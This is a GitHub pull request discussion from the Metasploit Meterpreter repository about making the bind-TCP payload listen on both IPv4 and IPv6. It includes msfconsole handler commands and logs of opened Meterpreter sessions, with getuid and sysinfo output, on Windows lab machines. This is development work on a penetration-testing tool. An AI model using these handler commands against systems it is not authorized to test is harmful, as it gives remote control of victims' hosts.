search

rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
326 stars 144 forks source link

Bind to IPv4 and IPv6 on the bind transport #142

Closed OJ closed 9 years ago

OJ commented 9 years ago

This PR includes code which attempts to bind to both IPv4 and IPv6 addresses so that the attacker can connect on either interface.

In the case of Windows XP, the IPv6 stack doesn't allow modification of the socket options so that both address types can be listened to on the same socket. Rather than create separate sockets for both cases, XP and earlier simply fall back to IPv4 only.

Verification

On the target (Win7), listener bound to both:

Z:\scratch>stagelessx86-bind.exe

Z:\scratch>netstat -an | findstr 8000
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING
  TCP    [::]:8000              [::]:0                 LISTENING

Z:\scratch>

On the attacker, connecting via IPv4 then IPv6:

msf exploit(handler) > set payload windows/meterpreter_bind_tcp
payload => windows/meterpreter_bind_tcp
msf exploit(handler) > set RHOST 10.1.10.35
RHOST => 10.1.10.35
msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 3 opened (10.1.10.40:47155 -> 10.1.10.35:8000) at 2015-03-30 18:54:35 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.35 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(handler) > set RHOST fe80::d920:55ed:6723:e541
RHOST => fe80::d920:55ed:6723:e541

restart the payload and then...

msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 4 opened (fe80::76d0:2bff:fe2c:7fc4%em1:36579 -> fe80::d920:55ed:6723:e541%em1:8000) at 2015-03-30 18:55:42 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] fe80::d920:55ed:6723:e541 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(handler) >
metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/166/ Test PASSED.

bcook-r7 commented 9 years ago

Looks good on Windows 8.1:

bcook@AUS-MAC:~/projects/metasploit-framework$ ./msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter_bind_tcp; set rhost 2001::2; run"
payload => windows/meterpreter_bind_tcp
rhost => 2001::2
[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (2001::1:49539 -> 2001::2:4444) at 2015-04-01 21:23:45 -0500

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

msf exploit(handler) > set rhost 192.168.56.102
rhost => 192.168.56.102
msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 3 opened (192.168.56.1:49541 -> 192.168.56.102:4444) at 2015-04-01 21:24:30 -0500

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

Windows XP is fine too:

msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 4 opened (192.168.56.1:50003 -> 192.168.56.103:4444) at 2015-04-01 21:44:36 -0500

meterpreter > sysinfo
Computer        : BRENT-4D9EAB94D
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
OJ commented 9 years ago

Sorry @bcook-r7 I didn't realise that there was a merge conflict here. This should be fixed up now. Thanks!

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/178/ Test PASSED.

bcook-r7 commented 9 years ago

Hmm, there wasn't when I first tested it. I think I merely forgot to push!

OJ commented 9 years ago

Classic :)

bcook-r7 commented 9 years ago

Thanks man!

OJ commented 9 years ago

Thank you!